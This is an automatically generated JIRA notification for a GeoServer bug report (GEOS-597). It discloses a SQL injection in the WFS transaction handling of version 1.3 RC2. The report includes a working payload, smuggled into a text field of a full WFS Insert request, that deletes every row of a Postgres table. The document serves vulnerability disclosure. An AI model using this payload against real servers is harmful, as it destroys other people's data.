sql-injection
-------------
Key: GEOS-597
URL: http://jira.codehaus.org/browse/GEOS-597
Project: GeoServer
Type: Bug
Components: WFS
Reporter: Uli Rothstein
Assigned to: dblasby
Priority: Critical
we've tested the following sql-injection:
<bemerkung>
\',null,null,null,null,31467);delete from
f_lw_digi_flaechen;--
</bemerkung>
This injection deletes all datasets in the table f_lw_digi_flaechen in our postgres database.
(Geoserver-Version 1.3 RC2)
The complete request:
<wfs:Transaction version="1.0.0" service="WFS"
xmlns="http://www.someserver.com/myns"
xmlns:gml="http://www.opengis.net/gml"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:alk="http://zdkwh.mlrbw.net:8080/geoserver/namespace/alk"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.someserver.com/myns http://wms1.ccgis.de/geoserver-1.3-beta4/wfs/getCapabilities?request=describefeaturetype&typename=mapbender_user http://www.opengis.net/wfs../wfs/1.0.0/WFS-transaction.xsd">
<wfs:Insert>
<alk:f_lw_digi_flaechen>
<ud_id>0813</ud_id>
<meldevertreter_id>0813</meldevertreter_id>
<objekttyp_id>3</objekttyp_id>
<objekttyp_name>Landw. Nutzfl.</objekttyp_name>
<bemerkung>
\',null,null,null,null,31467);delete from
f_lw_digi_flaechen;--
</bemerkung>
<the_geom>
<gml:MultiPolygon srsName="epsg:31467">
<gml:polygonMember>
<gml:Polygon>
<gml:outerBoundaryIs>
<gml:LinearRing>
<gml:coordinates>
3472900,5464590 3472930,5464420
3472990,5464530 3472990,5464670
3472900,5464590
</gml:coordinates>
</gml:LinearRing>
</gml:outerBoundaryIs>
</gml:Polygon>
</gml:polygonMember>
</gml:MultiPolygon>
</the_geom>
</alk:f_lw_digi_flaechen>
</wfs:Insert>
</wfs:Transaction>
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
http://jira.codehaus.org/secure/Administrators.jspa
-
For more information on JIRA, see:
http://www.atlassian.com/software/jira